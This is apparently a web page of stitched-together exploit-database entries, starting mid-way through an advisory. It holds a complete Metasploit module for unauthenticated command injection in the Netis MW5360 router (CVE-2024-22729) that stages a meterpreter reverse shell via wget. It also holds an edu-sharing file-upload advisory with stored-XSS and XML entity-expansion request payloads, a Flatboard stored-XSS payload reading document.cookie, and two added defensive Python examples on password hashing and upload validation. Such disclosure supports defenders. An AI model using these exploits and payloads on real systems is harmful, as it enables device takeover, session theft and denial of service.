Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Daniel Hirschberger / @2024<br /></code></pre>
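The timeline above records the direction of the vendor's fix for the password-at-rest problem: PBKDF2 with SHA-256 and 600000 iterations. The code below is an added example of that scheme, written for this page and not taken from Faronics; the record layout `pbkdf2_sha256$iterations$salt$hash` is an assumption. It generates a random per-record salt (the advisory faults the original MD5 use for having none), verifies with a constant-time comparison, and reports when a stored record, such as the cleartext `myadminpw` from the decrypted configuration, needs to be migrated.

```python
# Added example, not the vendor's code: salted PBKDF2-HMAC-SHA256 verifiers
# with the iteration count the advisory timeline reports (600000), plus a
# migration check for records stored under an older or weaker scheme.
import base64
import hashlib
import hmac
import os

ALGORITHM = "pbkdf2_sha256"
ITERATIONS = 600_000  # iteration count confirmed in the timeline on 2024-06-10
SALT_BYTES = 16


def hash_password(password, iterations=ITERATIONS, salt=None):
    """Derive a salted verifier; a fresh random salt is used unless one is supplied (tests only)."""
    if salt is None:
        salt = os.urandom(SALT_BYTES)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return "$".join([ALGORITHM, str(iterations),
                     base64.b64encode(salt).decode("ascii"),
                     base64.b64encode(dk).decode("ascii")])


def verify_password(password, stored):
    """Recompute the derivation from the stored parameters and compare in constant time."""
    try:
        algorithm, iterations, salt_b64, dk_b64 = stored.split("$")
        iterations = int(iterations)
        salt = base64.b64decode(salt_b64, validate=True)
        expected = base64.b64decode(dk_b64, validate=True)
    except ValueError:          # wrong field count, non-numeric count, bad base64
        return False
    if algorithm != ALGORITHM or iterations < 1 or not salt or not expected:
        return False
    actual = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations,
                                 dklen=len(expected))
    return hmac.compare_digest(actual, expected)


def needs_rehash(stored, min_iterations=ITERATIONS):
    """True for cleartext, another scheme, or fewer iterations than the current policy."""
    parts = stored.split("$")
    if len(parts) != 4 or parts[0] != ALGORITHM:
        return True
    try:
        return int(parts[1]) < min_iterations
    except ValueError:
        return True


if __name__ == "__main__":
    record = hash_password("myadminpw")
    print(record)
    print("verify:", verify_password("myadminpw", record), "| needs_rehash:", needs_rehash(record))
    print("legacy cleartext needs_rehash:", needs_rehash("myadminpw"))
```

Storing the iteration count inside the record is what makes `needs_rehash` possible: when policy moves to a higher count, existing users are migrated transparently on their next successful login instead of being forced to reset. Note that this addresses CVE-2024-36497 only; the static key that protects the configuration file (CVE-2024-36496) is a separate issue that, per the timeline, the vendor deferred to a future release.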
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> include Msf::Exploit::CmdStager<br /> include Msf::Exploit::FileDropper<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Netis router MW5360 unauthenticated RCE.',<br /> 'Description' => %q{<br /> Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.<br /> The vulnerability stems from improper handling of the "password" parameter within the router's web interface.<br /> The router's login page authorization can be bypassed by simply deleting the authorization header,<br /> leading to the vulnerability. All router firmware versions up to `V1.0.1.3442` are vulnerable.<br /> Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection<br /> vulnerability. 
When exploited, this can lead to unauthorized command execution, potentially allowing the attacker<br /> to take control of the router.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor<br /> 'Adhikara13' # Discovery of the vulnerability<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-22729'],<br /> ['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'],<br /> ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']<br /> ],<br /> 'DisclosureDate' => '2024-01-11',<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_MIPSLE],<br /> 'Privileged' => true,<br /> 'Targets' => [<br /> [<br /> 'Linux Dropper',<br /> {<br /> 'Platform' => ['linux'],<br /> 'Arch' => [ARCH_MIPSLE],<br /> 'Type' => :linux_dropper,<br /> 'CmdStagerFlavor' => ['wget'],<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'SSL' => false,<br /> 'RPORT' => 80<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]<br /> }<br /> )<br /> )<br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),<br /> OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])<br /> ])<br /> end<br /><br /> def execute_command(cmd, _opts = {})<br /> # cleanup payload file when session is established.<br /> if cmd.include?('chmod +x')<br /> register_files_for_cleanup(cmd.split('+x')[1].strip)<br /> end<br /> # skip last command to remove payload because it does not work<br /> unless cmd.include?('rm -f')<br /> payload = Base64.strict_encode64("`#{cmd}`")<br /> print_status("Executing #{cmd}")<br /> 
send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),<br /> 'vars_post' => {<br /> 'password' => payload,<br /> 'quick_set' => 'ap',<br /> 'app' => 'wan_set_shortcut'<br /> }<br /> })<br /> end<br /> end<br /><br /> def check<br /> print_status("Checking if #{peer} can be exploited.")<br /> res = send_request_cgi({<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),<br /> 'vars_post' => {<br /> 'mode_name' => 'skk_get',<br /> 'wl_link' => 0<br /> }<br /> })<br /> return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')<br /><br /> # trying to get the model and version number<br /> # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(<br /> version = res.body.match(/.?(version).?\s*:\s*.?((\\|[^,])*)/)<br /> # when found, remove whitespaces and make all uppercase to avoid suprises in string splitting and comparison<br /> unless version.nil?<br /> version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop<br /> # The model number part is usually something like Netis(NC63), but occassionally you see things like Stonet-N3D<br /> if version[2].upcase.split('-V')[0].include?('-')<br /> model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')<br /> else<br /> model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')<br /> end<br /> # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower<br /> if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))<br /> return CheckCode::Appears(version[2].chop.to_s)<br /> end<br /><br /> return CheckCode::Safe(version[2].chop.to_s)<br /> end<br /> CheckCode::Safe<br /> end<br /><br /> def exploit<br /> print_status("Executing #{target.name} for 
#{datastore['PAYLOAD']}")<br /> case target['Type']<br /> when :linux_dropper<br /> # Don't check the response here since the server won't respond<br /> # if the payload is successfully executed<br /> execute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY'])<br /> end<br /> end<br />end<br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240620-0 ><br />=======================================================================<br /> title: Arbitrary File Upload<br /> product: edu-sharing (metaVentis GmbH)<br />vulnerable versions: <8.0.8-RC2, <8.1.4-RC0, <9.0.0-RC19<br /> fixed versions: >=8.0.8-RC2, >=8.1.4-RC0, >=9.0.0-RC19<br /> CVE number: CVE-2024-28147<br /> impact: high<br /> homepage: https://edu-sharing.com<br /> found: 2024-04-04<br /> by: Kai Zimmermann (Office Frankfurt)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"edu-sharing software enables you to network your learning platforms and other<br />educational software. Share learning content, metadata and tools - make them<br />available in an educational cloud and let your users use them in all connected<br />systems."<br /><br />Source: https://edu-sharing.com<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patch which should be installed immediately.<br /><br />SEC Consult highly recommends to perform a thorough security review of the product<br />conducted by security professionals to identify and resolve potential further<br />security issues.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) Arbitrary File Upload (CVE-2024-28147)<br />An authenticated user can upload arbitrary files in the upload function for<br />collection preview images. An attacker may upload an HTML file that includes<br />malicious JavaScript code which will be executed if a user visits the direct<br />URL of the collection preview image (Stored Cross Site Scripting). 
It is also<br />possible to upload SVG files that include nested XML entities. Those are parsed<br />when a user visits the direct URL of the collection preview image, which may be<br />utilized for a Denial of Service attack.<br /><br /><br />Proof of concept:<br />-----------------<br />1) Arbitrary File Upload (CVE-2024-28147)<br />An authenticated user can update the preview image of an existing collection<br />by sending the following request:<br /><br />--------------------------------------------------------------------------------<br />POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fpng HTTP/1.1<br />Host: $SERVER<br />Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID<br />Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885<br />Content-Length: 288<br /><br />-----------------------------159605426213527963452762824885<br />Content-Disposition: form-data; name="file";<br /><br />‰PNG<br /><br />[...]<br />-----------------------------159605426213527963452762824885--<br />--------------------------------------------------------------------------------<br /><br />The URL parameter "mimetype" can be modified to match any uploaded file. The<br />value is directly used in the server's "Content-Type" header.<br />Both, the Content-Type request header and the filename parameter in the<br />Content-Disposition request header do not need to be included in the data<br />boundary inside the request in order to be sent successfully and can therefore<br />be removed.<br />The preview image can then be accessed by visiting the following URL:<br />https://$SERVER/edu-sharing/preview?nodeId=$COLLECTIONID<br /><br /><br />a. Stored Cross Site Scripting (HTML Upload)<br />The initial request can be modified to include an HTML file, while keeping<br />the magic bytes of a PNG image file. 
The "mimetype" parameter is changed to<br />"text/html":<br /><br />--------------------------------------------------------------------------------<br />POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=text/html HTTP/1.1<br />Host: $SERVER<br />Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID<br />Content-Type: multipart/form-data; boundary=---------------------------159605426213527963452762824885<br />Content-Length: 288<br /><br />-----------------------------159605426213527963452762824885<br />Content-Disposition: form-data; name="file";<br /><br />‰PNG<br /><br /><!DOCTYPE html><br /><html><br /><body><br /><h1>Test</h1><br /><script>alert(window.location)</script><br /></body><br /></html><br />-----------------------------159605426213527963452762824885--<br />--------------------------------------------------------------------------------<br /><br />Visiting the preview URL as seen in figure 1 below shows that the JavaScript<br />code is executed:<br />[01_stored_xss.png]<br /><br /><br />b. Denial of Service (SVG Upload)<br />The initial request can be modified to upload an SVG file containing<br />nested XML entities. 
The "mimetype" parameter is changed to "image%2Fsvg":<br /><br />--------------------------------------------------------------------------------<br />POST /edu-sharing/rest/collection/v1/collections/-home-/$COLLECTIONID/icon?mimetype=image%2Fsvg HTTP/1.1<br />Host: $SERVER<br />Cookie: INGRESSCOOKIE=$INGRESSCOOKIE; JSESSIONID=$SESSIONID<br />Content-Type: multipart/form-data; boundary=---------------------------29539943986372261721095197803<br />Content-Length: 581<br /><br />-----------------------------29539943986372261721095197803<br />Content-Disposition: form-data; name="file";<br /><br /><?xml version="1.0" encoding="UTF-8"?><br /><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY bar "Text "><!ENTITY t1 <br />"&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;&bar;"><!ENTITY t2 "&t1;&t1;&t1;&t1;">]><br /><svg xmlns="http://www.w3.org/2000/svg"><br /> <data>&t2;</data><br /></svg><br /><br />-----------------------------29539943986372261721095197803--<br />--------------------------------------------------------------------------------<br /><br />Visiting the preview URL as seen in figure 2 below shows that the XML code is<br />parsed:<br />[02_denial_of_service]<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The following version has been tested which was the latest version available<br />at the time of the test:<br />* 9.0 (pre-release)<br /><br />The vendor confirmed that previous versions (8.0 and 8.1) are affected as well.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2024-04-10: Contacting vendor through security@edu-sharing.com<br />2024-04-11: Vendor replied and confirmed security contact.<br /> Advisory information has been sent to vendor.<br />2024-04-12: Vendor confirmed receiving the advisory and is now trying to<br /> reproduce the described behavior.<br />2024-05-03: Reminder sent 
to security@edu-sharing.com, asking for an update on<br /> fixing the vulnerability.<br />2024-05-07: Vendor provides affected versions. Fixes have already been implemented<br /> and published. Vendor is requesting to wait with the public advisory<br /> release in order to allow affected customers to perform the next rollout.<br />2024-05-07: Vendor provides fixed versions.<br /> Public advisory release scheduled for 2024-06-04.<br />2024-05-15: Public advisory release postponed to 2024-06-20.<br />2024-06-20: Coordinated release of advisory.<br /><br /><br />Solution:<br />---------<br />The repository base version in use can be identified in the Admin-Tools.<br />The vendor provides a patch for the affected versions:<br />* Version 8.0: Update repository version to "8.0.8-RC2" or later<br />* Version 8.1: Update repository version to "8.1.4-RC0" or later<br />* Version 9.0: Update repository version to "9.0.0-RC19" or later<br /><br /><br />Workaround:<br />-----------<br />None<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br />An integrated part of SEC Consult, an Eviden business<br />Europe | Asia<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an<br />Eviden business. It ensures the continued knowledge gain of SEC Consult in the<br />field of network and application security to stay ahead of the attacker. 
The<br />SEC Consult Vulnerability Lab supports high-quality penetration testing and<br />the evaluation of new offensive and defensive technologies for our customers.<br />Hence our customers obtain the most current information about vulnerabilities<br />and valid recommendation about the risk profile of new technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested to work with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: https://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Kai Zimmermann / 2024<br /></code></pre>
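The advisory above describes an upload endpoint that trusts the client-supplied "mimetype" parameter and accepts any body that starts with PNG magic bytes. The following Python block is an added example, not code from edu-sharing, metaVentis or SEC Consult; it models the server-side checks that defeat both proof-of-concept uploads: the claimed type is only compared against an allow-list, the PNG chunk chain is walked so that magic bytes followed by HTML are rejected, SVG bodies carrying a DOCTYPE or entity declarations are refused, and the stored file is served with headers that stop browsers from sniffing. The function names, the allow-list and the sample bodies are assumptions constructed for this example.

```python
"""Server-side validation for an image upload endpoint.

Added example, not edu-sharing code. Models the checks that defeat the two
proof-of-concept uploads in the advisory: a body that carries PNG magic bytes
followed by HTML, and an SVG carrying a DOCTYPE with nested entities.
"""
import re
import struct
import zlib
from typing import Dict, Tuple

# Assumed allow-list for the endpoint. The client-supplied "mimetype" parameter
# is only ever compared against this set; it never reaches the Content-Type
# header unvalidated. Drop "image/svg+xml" if SVG previews are not required.
ALLOWED_TYPES = {"image/png", "image/svg+xml"}

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
DTD_MARKER = re.compile(rb"<!\s*(DOCTYPE|ENTITY)", re.IGNORECASE)


def is_valid_png(data: bytes) -> bool:
    """Walk the PNG chunk chain: signature, IHDR first, CRC on every chunk,
    IEND last with nothing after it. Magic bytes alone are not enough; the PoC
    body passes a magic-byte check but fails here at the first chunk header."""
    if not data.startswith(PNG_SIGNATURE):
        return False
    pos = len(PNG_SIGNATURE)
    expect_ihdr = True
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        if expect_ihdr and ctype != b"IHDR":
            return False
        expect_ihdr = False
        body_end = pos + 8 + length
        if body_end + 4 > len(data):
            return False
        (crc,) = struct.unpack(">I", data[body_end:body_end + 4])
        if zlib.crc32(data[pos + 4:body_end]) & 0xFFFFFFFF != crc:
            return False
        if ctype == b"IEND":
            return body_end + 4 == len(data)  # trailing data is rejected
        pos = body_end + 4
    return False  # ran out of bytes before IEND


def svg_has_dtd(data: bytes) -> bool:
    """Reject any SVG that declares a DTD or entities; a preview image never
    needs them and they are the vehicle for entity-expansion DoS."""
    return DTD_MARKER.search(data) is not None


def validate_upload(claimed_mimetype: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason-or-validated-type)."""
    if claimed_mimetype not in ALLOWED_TYPES:
        return False, f"mimetype {claimed_mimetype!r} not in allow-list"
    if claimed_mimetype == "image/png" and not is_valid_png(data):
        return False, "body is not a well-formed PNG"
    if claimed_mimetype == "image/svg+xml" and svg_has_dtd(data):
        return False, "SVG with DOCTYPE/ENTITY declarations rejected"
    return True, claimed_mimetype


def response_headers(validated_type: str) -> Dict[str, str]:
    """Headers for serving the stored preview: the validated type, no sniffing,
    and a CSP that keeps scripts inert if an SVG is ever rendered inline."""
    return {
        "Content-Type": validated_type,
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; sandbox",
    }


# --- constructed sample bodies (not captured from a real system) -------------
def _chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def make_minimal_png() -> bytes:
    """A 1x1 grayscale PNG built from its chunks."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 0, 0, 0, 0)
    idat = zlib.compress(b"\x00\x00")  # filter byte + one pixel
    return PNG_SIGNATURE + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


# Modelled on the advisory's first PoC: PNG magic bytes with an HTML document behind them.
POC_HTML_BODY = PNG_SIGNATURE + b"<!DOCTYPE html><html><body><script></script></body></html>"
# Modelled on the advisory's second PoC: SVG with a DTD declaring nested entities.
POC_SVG_BODY = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE foo [<!ENTITY bar "Text "><!ENTITY t1 "&bar;&bar;">]>'
    b'<svg xmlns="http://www.w3.org/2000/svg"><data>&t1;</data></svg>'
)
PLAIN_SVG_BODY = b'<svg xmlns="http://www.w3.org/2000/svg"><circle r="1"/></svg>'

if __name__ == "__main__":
    for mimetype, body in [("image/png", make_minimal_png()),
                           ("image/png", POC_HTML_BODY),
                           ("text/html", POC_HTML_BODY),
                           ("image/svg", POC_SVG_BODY),
                           ("image/svg+xml", POC_SVG_BODY),
                           ("image/svg+xml", PLAIN_SVG_BODY)]:
        print(mimetype, validate_upload(mimetype, body))
```

Run as a script, the loop accepts only the well-formed PNG and the DTD-free SVG; the two PoC-shaped bodies are refused whether they arrive under the advisory's "text/html" and "image/svg" values (allow-list) or under a permitted type (structural checks). The `nosniff` header matters even after validation: without it a browser may still reinterpret a served body based on its content rather than the declared type.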
<pre><code># Exploit Title: Flatboard v3.2 - Stored XSS<br /># Date: 2024-06-23<br /># Exploit Author: tmrswrr<br /># Category: Webapps<br /># Vendor Homepage: https://flatboard.org/<br /># Version: 3.2<br /><br /><br />----------------------------------------------------------------------------------------------------<br /><br />1- Log in to the admin panel and go to this URL: https://127.0.0.1//Flatboard/index.php/forum<br />2- Click Add Forum and enter your payload in the Information field: "><img src=x onerrora=confirm() onerror=confirm(document.cookie)><br />3- Save it; the alert box will be displayed.<br /><br /><br /></code></pre>